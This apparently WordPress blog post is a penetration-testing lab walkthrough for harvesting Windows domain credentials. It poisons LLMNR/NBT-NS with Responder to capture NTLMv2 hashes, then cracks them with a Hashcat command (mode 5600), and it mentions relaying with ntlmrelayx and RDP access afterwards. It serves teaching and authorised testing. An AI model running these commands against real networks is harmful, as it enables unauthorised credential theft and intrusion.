Domain Penetration Testing: Credential Harvesting via LLMNR Poisoning

Depending on the pentest given (whitebox/greybox/blackbox) you may or may not have a scope. For these examples, I’ll be under the assumption I have a scope from the customer for their domain, corp.local which runs under the 192.168.1.0/24 network. For these examples, I have my ESXI server running four VMs:

Windows Server 2008 R2 (Primary DC)

Windows 7 (Workstation)

Windows Server 2003 (Secondary DC)

Windows XP (Unpatched; Workstation)

My initial scan reveals the four machines and their IPs. The workstations look like they might have old software with exploitable vulnerabilities, however I want to try and see what credentials I can find on the network before resulting to traditional exploits like buffer overflows. To do this, I’ll be using a tool called Responder to exploit LLMNR and NBT-NS if the network is configured to use those protocols (Usually on by default). To summarize what they do, when you type in a network share, say \\Fileserver01\, but it doesn’t exist, by default Windows will send out a LLMNR broadcast across the network to see if anyone knows where it is. If that fails, it then uses NBT-NS. When that fails, you get the error message saying the share cannot be found. But, by using Responder, we broadcast spoofed LLMNR and NBT-NS responses by saying “yeah, that share exists, what’s your username and password?” which is then passed to Responder, but the password is an NTLMv2 hash.

Here it is in action:

By default, Kali has Responder installed already, so all you need to do is type

responder -I eth0

Or whatever interface you’re using.

responder1

Next, is to simulate a user mistyping a share.

responder2

And we now see the LLMNR request in responder

resp3.PNG

And a short while later we get the user’s hashed credentials:

resp4.PNG

NTLMv1/2 hashes cannot be passed. Regular NTLM hashes can, but if it’s v1/v2 it cannot. So we have two options:

  1. We can crack it
  2. We can relay it using a tool like ntlmrelayx.py

Cracking is always a viable option anyways but doesn’t always work, especially if the group policy enforces a strong password. For relaying, you can read my write-up here,  but for this write up, I will just crack it. I personally like Hashcat since it can utilize my GPU.

Note: I have hashcat installed on Windows

Cracking the Hash via Hashcat

By default, the hash is stored in /usr/share/responder/logs

Using the command

hashcat64.exe -m 5600 hash.txt password.txt -o results.txt

Where “hash.txt” is my hash and “password.txt” is my wordlist and “results.txt” is my output file. -m 5600 is for the hash type, which is NTLMv2.

Shortly after running the command, the password is cracked.

resp5.PNG

From here I could then RDP into the machine and do as I please, or use it to enumerate other machines, which is shown in my post here.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: